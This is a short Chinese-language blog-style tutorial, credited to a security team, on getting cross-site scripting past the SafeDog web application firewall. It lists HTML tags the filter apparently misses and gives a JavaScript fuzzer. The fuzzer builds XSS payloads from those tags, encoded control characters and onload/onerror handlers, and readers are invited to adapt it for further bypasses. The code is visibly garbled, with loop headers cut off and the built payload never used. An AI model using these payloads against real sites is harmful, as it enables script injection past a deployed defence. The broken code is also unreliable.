如果无法学会绕过,那就只有一个结果:
Bypass
学习文章来源:米斯特安全团队
JS代码往往要在
标签表达式: <标签名 控制字符="" 属性名="数据值" 事件名="事件值">
没被安全狗过滤的标签:
a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base body head html main mark menu meta aside audio meter video applet button dialog header keygen acronym address article details basefont datalist menuitem blockquote
可以弹窗的:
alert,prompt ,confirm,base64加密,编码绕过
payload代码:
var i,j,k,xss,f=0;
var ons = ["onload","onerror"];
var labs = ["a","b","q","br","dd","dl","dt","h1","del","abbr","video","base","audio","details"];
var hexs= ["%09","%00","%0d","%0a"];
for(i=0;i
for(j=0;j
for(k=0;k
xss = f+'<'+labs[i]+hexs[j]+ons[k]+"=alert("+f+") src=a>a";
var body = document.getElementsByTagName("body");
var div = document.createElement("div");
div.innerHTML = f+"";
document.body.appendChild(div);
f = f+1;
}
}
}
可以用以上代码bypass安全狗
以上的代码,可以根据自己的需求进行修改,创造更多的绕过方法。
<%2fIFRAME>
参考文章: